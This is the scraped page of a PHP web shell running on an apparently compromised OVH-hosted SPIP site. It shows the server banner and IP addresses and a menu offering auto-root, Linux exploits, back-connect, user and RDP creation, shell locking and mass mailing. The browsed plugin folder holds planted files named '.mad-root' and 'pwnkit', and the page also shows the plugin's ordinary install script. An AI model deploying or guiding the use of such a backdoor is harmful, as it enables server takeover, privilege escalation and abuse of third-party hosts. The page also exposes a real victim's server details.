Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins-dist /
bigup /
[ HOME SHELL ]
Name
Size
Permission
Action
action
[ DIR ]
drwx---r-x
balise
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
formulaires
[ DIR ]
drwx---r-x
genie
[ DIR ]
drwx---r-x
inc
[ DIR ]
drwx---r-x
javascript
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
lib
[ DIR ]
drwx---r-x
prive
[ DIR ]
drwx---r-x
saisies
[ DIR ]
drwx---r-x
saisies-vues
[ DIR ]
drwx---r-x
.gitattributes
232
B
-rw----r--
.gitignore
92
B
-rw----r--
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
2.98
KB
-rw----r--
README.md
5.44
KB
-rw----r--
bigup_administrations.php
1.52
KB
-rw----r--
bigup_fonctions.php
8.09
KB
-rw----r--
bigup_pipelines.php
12.6
KB
-rw----r--
composer.json
416
B
-rw----r--
paquet.xml
1.64
KB
-rw----r--
phpcs.xml.dist
433
B
-rw----r--
phpstan-baseline.neon
8.1
KB
-rw----r--
phpstan.neon.dist
201
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bigup_administrations.php
<?php /** * Fichier gérant l'installation et désinstallation du plugin Big Upload * * @plugin Big Upload * @copyright 2015 * @author marcimat * @licence GNU/GPL * @package SPIP\Bigup\Installation */ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Fonction d'installation et de mise à jour du plugin Big Upload. * * @param string $nom_meta_base_version * Nom de la meta informant de la version du schéma de données du plugin installé dans SPIP * @param string $version_cible * Version du schéma de données dans ce plugin (déclaré dans paquet.xml) * @return void **/ function bigup_upgrade($nom_meta_base_version, $version_cible) { $maj = []; $max_file_size_php = 0; include_spip('medias_fonctions'); if (function_exists('medias_inigetoctets')) { $max_file_size_php = medias_inigetoctets('upload_max_filesize') / (1024 * 1024); } // Configuration par défaut $config_defaut = [ 'max_file_size' => max($max_file_size_php, 10), ]; $maj['create'] = [['ecrire_meta', 'bigup', serialize($config_defaut)]]; $maj['1.0.1'] = [['ecrire_meta', 'bigup', serialize($config_defaut)]]; include_spip('base/upgrade'); maj_plugin($nom_meta_base_version, $version_cible, $maj); } /** * Fonction de désinstallation du plugin Big Upload. * * @param string $nom_meta_base_version * Nom de la meta informant de la version du schéma de données du plugin installé dans SPIP * @return void **/ function bigup_vider_tables($nom_meta_base_version) { effacer_meta($nom_meta_base_version); }
Close